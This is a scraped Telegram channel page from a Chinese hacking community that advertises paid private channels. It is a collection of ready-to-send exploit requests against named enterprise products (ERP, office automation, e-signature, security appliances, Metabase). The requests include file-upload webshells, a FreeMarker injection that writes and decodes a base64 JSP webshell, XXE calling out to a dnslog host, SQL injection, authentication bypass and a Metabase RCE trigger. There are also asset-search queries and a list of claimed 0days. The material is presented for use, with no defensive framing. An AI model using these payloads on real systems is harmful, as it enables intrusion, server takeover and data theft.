en
Feedback
黑客自由城 优质内容共享

黑客自由城 优质内容共享

Open in Telegram

telegram最大的黑客交流社区 @Hacker_CityN (核心技术) @Hacker_CityM (核心发布) @DARKWEBEN (担保主群) @DARKWEB_EN2 (渗透推文) @hackerspike (资源交流) @spike_hacker (资源分享) @kaliLinux666 (收款存根) @Hacker_CityL (业务对接) 私有频道联系管理员付费加入

Show more
The country is not specifiedTechnologies & Applications33 626
2 390
Subscribers
-124 hours
-17 days
+330 days
Posts Archive
明源云 ERP ApiUpdate.ashx 文件上传漏洞 POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1Host: target.com Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 856 {{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}

大华智慧园区 任意密码读取漏洞 GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

契约锁电子签章系统 RCE POST /callback/%2E%2E;/code/upload HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type:multipart/form-data; boundary=----GokVTLZMRxcJWKfeCvEsYHlszxEANApZseNMGLki ----GokVTLZMRxcJWKfeCvEsYHlszxEANApZseNMGLki Content-Disposition: form-data; name="type"; TIMETASK ----GokVTLZMRxcJWKfeCvEsYHlszxEANApZseNMGLki Content-Disposition: form-data; name="file"; filename="qys.jpg" 马儿 ----GokVTLZMRxcJWKfeCvEsYHlszxEANApZseNMGLki

用友文件服务器认证绕过 资产搜索: app="用友-NC-Cloud" 或者是app="用友-NC-Cloud" && server=="Apache-Coyote/1.1" POST数据包修改返回包 false改成ture就可以绕过登陆 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 10 Aug 2023 20:38:25 GMT Connection: close Content-Length: 17 {"login":"false"}

深信服数据中心管理系统 XML 实体注入漏洞 GET /src/sangforindex HTTP/1.1 Host: ip:port Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Win
深信服数据中心管理系统 XML 实体注入漏洞 GET /src/sangforindex HTTP/1.1 Host: ip:port Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Accept: text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: text/xml Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: Keep-alive Content-Length: 135 <?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [ <!ENTITY rootas SYSTEM "http://dnslog"> ]> <xxx> &rootas; </xxx>

金蝶云星空 CommonFileserver 任意文件读取漏洞 POC GET /CommonFileServer/c:/windows/win.ini

用友时空 KSOA servletimagefield 文件 sKeyvalue 参数 SQL 注入漏洞 POC GET http://target.com/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) 5bGx5rW35LmL5YWz Accept-Encoding: gzip, deflateConnection: close

新开普智慧校园系统代码执行漏洞 漏洞编号 无 影响产品 无 利用状态 在野利用(已公开poc) 漏洞详情 新开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷。 路径存在则漏洞存在 http://xxx.com/service_transport/service.action 纯文本   poc没回显 POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 {        "command": "GetFZinfo",        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c ping v0u26h.ceye.io\")}" } 纯文本   写文件 POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 {        "command": "GetFZinfo",        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd2QiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU+ >./webapps/ROOT/1.txt\")}" } 纯文本   文件转换为jsp POST /service_transport/service.action HTTP/1.1 Host: your-ip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 {        "command": "GetFZinfo",        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}" }

万户 ezOFFICE 协同办公平台 wpsservlet 接口文件上传漏洞 POC POST http://target.com/defaultroot/wpsservlet?option=saveNewFile&newdocId=test&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Content-Length: 266 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=803e058d60f347f7b3c17fa95228eca6 Accept-Encoding: gzip, deflate Connection: close --803e058d60f347f7b3c17fa95228eca6 Content-Disposition: form-data; name="NewFile"; filename="test.jsp" <% jsp 马儿 %> --803e058d60f347f7b3c17fa95228eca6--

启明星辰4A统一安全管控平台getMaster信息泄露 FOFA app="启明星⾠-4A统⼀安全管控平台" POC https://xxxxxxx/accountApi/getMaster.do
启明星辰4A统一安全管控平台getMaster信息泄露 FOFA app="启明星⾠-4A统⼀安全管控平台" POC https://xxxxxxx/accountApi/getMaster.do

锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露漏洞 POC GET /EXCU_SHELL HTTP/1.1Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15 Cmdnum: 1 Command1: show running-config Confirm1: n Accept-Encoding: gzip

企望制造 ERP comboxstore.action 远程命令执行漏洞 任我行 CRM SmsDataList SQL注入 POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000' and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI

Metabase validate 远程命令执行漏洞 先访问 /api/session/properties 获取token 然后POST /api/setup/validate HTTP/1.1 Host: Content-Type: application/json Content-Length: 812 { "token": "token", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('执行命令处')\n$$--=x", "advanced-options": false, "ssl": true }, "name": "an-sec-research-team", "engine": "h2" } }

Repost from 踹哈公寓
云函数API接口列表.pdf0.43 KB

Repost from 踹哈公寓
【演练实时消息】 绿盟SAS安全审计系统 GetFile 任意文件读取漏洞 平台编号:360LDYLD-2023-00002408,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情 亿赛通电子文档安全管理系统 importFileType 文件上传漏洞 平台编号:360LDYLD-2023-00002494,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。 泛微 E-Office 任意文件上传漏洞 平台编号:360LDYLD-2023-00002492,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。 通达OA SQL注入漏洞 平台编号:360LDYLD-2023-00002486,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

证语问安实验室-最新漏洞POC_exp集合站.docx0.32 KB

22hvv蓝队溯源拿份(记得离线一份概率删除 保存一下快照) https://mp.weixin.qq.com/s/hPfgJ7zl2jOretuUazrbxQ

nday消息同步 1海康威视综合安防前台文件上传漏洞 这个洞厂商修复有些问题,还是可以通过...跳转到根目录,换个接口而已 2.蓝凌OA前台代码执行漏洞 蓝凌V131415就不说了,去年代码执行、金格接口打得很凶,今年蓝凌有了大更新之后还是存在很多RCE问题 3.致远M3Server-xxxx反序列化漏洞 懂得都懂 4.致远A8V8SP1SP2文件上传漏洞(1dav) 1day,今年年初修复了很多,ajaxdo接口ajaxAction涉及的文件操作方法还是很多的 5.普元EOS 前台代码执行漏洞,这系统代码执行也太多了不赘述,建议重开6泛微F-coloav后合文件上传漏洞(0dav 从数据库读xxx,然后写到根目录,除了一些流 传的1day之外泛微可以说基本已安全,RASP能 绕也不想耗费精力继续看了,这个洞是针对去年 的前台洞绕过。 7泛微E-Mobile任意用户登录(1day) Emobile很难做后续利用,不过如果存在信息泄露风险的可以关注下8泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞,office9洞太多用的少没必要写了 9契约锁电子签章系统RCE(1day) 上海某行动期间已修复,更新补丁很快,这家签章平台响应速度还是很快的,和泛微ECO经常同框打包卖 10.亿赛通电子文档平台文件上传漏洞市面上的上传1day其实去年补丁都打完了,今年有新的,可以注意下 11.ldocview命令执行漏洞 去年项目挖的,今年还在12jeesite代码执行漏洞Oday,丁真来了都得说真13LiveBOS文件上传漏洞 金融单位供应链,不需要前几年的跳目录了,新 版本灵动框架的上传绕过绕的很emmm 14.用友nc-cloud-任意文件写入(Oday NCCLOUD今年用过大部分都没修 15.一哥VPN 预计今年二进制漏洞打得也会很凶,端口PWN! 16.xxIOA PWN 零信任不一定真的安全 17.xxx准入PWN 弱口令记得也要修一修 18.深信服应用交付系统命令执行 19.协同办公文档(DzzOfffice)未授权访问 20.电子签章平台代码执行漏洞 21泛微oa进后台漏洞 22.ucloud的未授权获取任意用户cookie 23.飞书客户端RCE漏洞 24.泛微EofficeV10前台RCE 25.来客推商城任意文件上传 26天明堡垒机Oday 27明御运维审计与风险控制系统堡垒机任意用户注册28协同管理系统存在SQL注入29泛微emobile注入漏洞 30.拓尔思WCM任意命令执行漏洞 31.用友财务云任意文件上传漏洞

+5
《2021年中国周边APT组织活动年鉴》.pdf4.21 MB